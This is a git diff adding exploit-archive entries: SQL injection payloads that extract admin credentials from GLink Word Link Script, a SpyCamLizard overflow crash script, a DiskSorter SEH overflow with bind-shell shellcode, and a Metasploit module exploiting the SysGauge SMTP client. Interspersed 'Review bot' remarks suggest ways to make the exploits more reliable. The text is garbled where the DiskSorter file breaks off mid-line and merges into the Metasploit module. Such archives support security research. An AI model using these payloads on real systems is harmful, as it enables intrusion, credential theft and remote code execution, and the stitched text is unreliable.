11 (SIGSEGV) +==10685== General Protection Fault +==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) +==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) +==10685== by 0x5B711F8: printf (printf.c:33) +==10685== by 0x109F05: load_apng(char*, std::vector >&) (apngdis.cpp:200) +==10685== by 0x10B24E: main (apngdis.cpp:498) +Reading '==10685== +==10685== HEAP SUMMARY: +==10685== in use at exit: 0 bytes in 0 blocks +==10685== total heap usage: 2 allocs, 2 frees, 73,728 bytes allocated +==10685== +==10685== All heap blocks were freed -- no leaks are possible diff --git a/platforms/php/webapps/41665.txt b/platforms/php/webapps/41665.txt new file mode 100755 index 000000000..78a0f42f6 --- /dev/null +++ b/platforms/php/webapps/41665.txt 
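Review bot: The `# CVE : CVE-2017-6191` line repeats the identifier that 41668.txt assigns to the chunk-size-descriptor heap overflow, while this file documents a different bug (an unchecked `strcpy` of argv[1] into `szPath[256]`); the identifier looks copy-pasted and should be checked against the CVE record before the entry is indexed under it. The quoted `main` excerpt and the Valgrind traces have lost their template arguments (`std::vector frames;`, `std::vector >&`), most likely from angle brackets being stripped on import, so the excerpt no longer reads as valid C++. The excerpt also stops right after the `strcpy` call; a line such as `/* ... rest of main() omitted ... */` would make clear that it is abridged rather than the whole function.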
@@ -0,0 +1,24 @@ +# # # # # +# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection +# Google Dork: N/A +# Date: 22.03.2017 +# Vendor Homepage: http://www.tufat.com/ +# Software: http://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip +# Demo: http://www.tufat.com/glink-word-link-script/ +# Version: 1.2.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/url.php?id=[SQL] +# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+- +# http://localhost/[PATH]/get_words.php?gid=[SQL] +# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3 +# http://localhost/[PATH]/get_words.php?wid=[SQL] +# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3 +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/windows/dos/41667.py b/platforms/windows/dos/41667.py new file mode 100755 index 000000000..f331ca5d1 --- /dev/null +++ b/platforms/windows/dos/41667.py 
@@ -0,0 +1,36 @@
+import socket
+import sys
+
+author = '''
+
+ ##############################################
+ # Created: ScrR1pTK1dd13 #
+ # Name: Greg Priest #
+ # Mail: ScR1pTK1dd13.slammer@gmail.com #
+ ##############################################
+
+# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
+# Date: 2017.03.22
+# Exploit Author: Greg Priest
+# Version: SpyCamLizard v1.230
+# Tested on: Windows7 x64 HUN/ENG Enterprise
+'''
+
+print "SpyCamLizard DoS Exploit running!"
+
+host = "192.168.56.1"
+port = 80
+overflow = "A" * 1189
+nextSEH = "BBBB"
+SEH = "CCCC"
+overflow2= "D" * 3803
+
+crash = overflow+nextSEH+SEH+overflow2
+
+httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+httpsocket.connect((host,port))
+httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
+httpsocket.close()
+
+
+print "SpyCamLizard shutted down!"
diff --git a/platforms/windows/remote/41666.py b/platforms/windows/remote/41666.py
new file mode 100755
index 000000000..ecd58b616
--- /dev/null
+++ b/platforms/windows/remote/41666.py
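Review bot: `httpsocket.send()` on this ~5 KB request may return after a partial write, so the bytes at offset 1189 that `nextSEH`/`SEH` are meant to land on can be dropped while the script still prints "SpyCamLizard shutted down!"; use `httpsocket.sendall("GET " + crash + " HTTP/1.0\r\n\r\n")` instead. `import sys` is unused while `host`/`port` are hard-coded, so `host = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.1"` would make the PoC runnable without editing the file. `connect()` has no timeout and no `except socket.error` around it, and nothing observes the crash, so the closing message is an assumption rather than a result; a comment such as `# DoS only: SEH overwrite is labelled but not verified here` in the header would keep the `nextSEH`/`SEH` names from implying more than the script shows.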
@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+
+# Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH)
+# Date: 2017-03-22
+# Exploit Author: Daniel Teixeira
+# Author Homepage: www.danielteixeira.com
+# Vendor Homepage: http://www.disksorter.com
+# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
+# Version: 9.5.12
+# Tested on: Windows 7 SP1 x86
+
+import socket,os,time,struct
+
+host = "192.168.2.186"
+port = 80
+
+#Bad Chars \x00\x09\x0a\x0d\x20"
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python
+shellcode = ""
+shellcode += "\xd9\xc0\xd9\x74\x24\xf4\x5e\xbf\xb0\x9b\x0e\xf2\x33"
+shellcode += "\xc9\xb1\x53\x31\x7e\x17\x83\xee\xfc\x03\xce\x88\xec"
+shellcode += "\x07\xd2\x47\x72\xe7\x2a\x98\x13\x61\xcf\xa9\x13\x15"
+shellcode += "\x84\x9a\xa3\x5d\xc8\x16\x4f\x33\xf8\xad\x3d\x9c\x0f"
+shellcode += "\x05\x8b\xfa\x3e\x96\xa0\x3f\x21\x14\xbb\x13\x81\x25"
+shellcode += "\x74\x66\xc0\x62\x69\x8b\x90\x3b\xe5\x3e\x04\x4f\xb3"
+shellcode += "\x82\xaf\x03\x55\x83\x4c\xd3\x54\xa2\xc3\x6f\x0f\x64"
+shellcode += "\xe2\xbc\x3b\x2d\xfc\xa1\x06\xe7\x77\x11\xfc\xf6\x51"
+shellcode += "\x6b\xfd\x55\x9c\x43\x0c\xa7\xd9\x64\xef\xd2\x13\x97"
+shellcode += "\x92\xe4\xe0\xe5\x48\x60\xf2\x4e\x1a\xd2\xde\x6f\xcf"
+shellcode += "\x85\x95\x7c\xa4\xc2\xf1\x60\x3b\x06\x8a\x9d\xb0\xa9"
+shellcode += "\x5c\x14\x82\x8d\x78\x7c\x50\xaf\xd9\xd8\x37\xd0\x39"
+shellcode += "\x83\xe8\x74\x32\x2e\xfc\x04\x19\x27\x31\x25\xa1\xb7"
+shellcode += "\x5d\x3e\xd2\x85\xc2\x94\x7c\xa6\x8b\x32\x7b\xc9\xa1"
+shellcode += "\x83\x13\x34\x4a\xf4\x3a\xf3\x1e\xa4\x54\xd2\x1e\x2f"
+shellcode += "\xa4\xdb\xca\xda\xac\x7a\xa5\xf8\x51\x3c\x15\xbd\xf9"
+shellcode += "\xd5\x7f\x32\x26\xc5\x7f\x98\x4f\x6e\x82\x23\x7e\x33"
+shellcode += "\x0b\xc5\xea\xdb\x5d\x5d\x82\x19\xba\x56\x35\x61\xe8"
+shellcode += "\xce\xd1\x2a\xfa\xc9\xde\xaa\x28\x7e\x48\x21\x3f\xba"
+shellcode += 
"\x69\x36\x6a\xea\xfe\xa1\xe0\x7b\x4d\x53\xf4\x51\x25" +shellcode += "\xf0\x67\x3e\xb5\x7f\x94\xe9\xe2\x28\x6a\xe0\x66\xc5" +shellcode += "\xd5\x5a\x94\x14\x83\xa5\x1c\xc3\x70\x2b\x9d\x86\xcd" +shellcode += "\x0f\x8d\x5e\xcd\x0b\xf9\x0e\x98\xc5\x57\xe9\x72\xa4" +shellcode += "\x01\xa3\x29\x6e\xc5\x32\x02\xb1\x93\x3a\x4f\x47\x7b" +shellcode += "\x8a\x26\x1e\x84\x23\xaf\x96\xfd\x59\x4f\x58\xd4\xd9" +shellcode += "\x7f\x13\x74\x4b\xe8\xfa\xed\xc9\x75\xfd\xd8\x0e\x80" +shellcode += "\x7e\xe8\xee\x77\x9e\x99\xeb\x3c\x18\x72\x86\x2d\xcd" +shellcode += "\x74\x35\x4d\xc4" + +#Buffer overflow +junk = "A" * 2487 + +#JMP Short = EB 05 +nSEH = "\x90\x90\xEB\x05" #Jump short 5 +#POP POP RET (libspp.dll) +SEH = struct.pack(' 'SysGauge SMTP Validation Buffer Overflow', + 'Description' => %q{ + This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 + via its SMTP server validation. The module sends a malicious response along in the + 220 service ready response and exploits the client, resulting in an unprivileged shell. + }, + 'Author' => + [ + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'Peter Baris' # Initial discovery and PoC + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '41479' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Space' => 306, + 'BadChars' => "\x00\x0a\x0d\x20" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal', + { + 'Offset' => 176, + 'Ret' => 0x6527635E # call esp # QtGui4.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 28 2017', + 'DefaultTarget' => 0 + ) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]), + ]) + end + + def on_client_connect(c) + # Note here that the payload must be split into two parts. + # The payload gets jumbled in the stack so we need to split + # and align to get it to execute correctly. 
+ sploit = "220 "
+ sploit << rand_text(target['Offset'])
+ # Can only use the last part starting from 232 bytes in
+ sploit << payload.encoded[232..-1]
+ sploit << rand_text(2)
+ sploit << [target.ret].pack('V')
+ sploit << rand_text(12)
+ sploit << make_nops(8)
+ # And the first part up to 232 bytes
+ sploit << payload.encoded[0..231]
+ sploit << "ESMTP Sendmail \r\n"
+
+ print_status("Client connected: " + c.peerhost)
+ print_status("Sending payload...")
+
+ c.put(sploit)
+ end
+
+end
\ No newline at end of file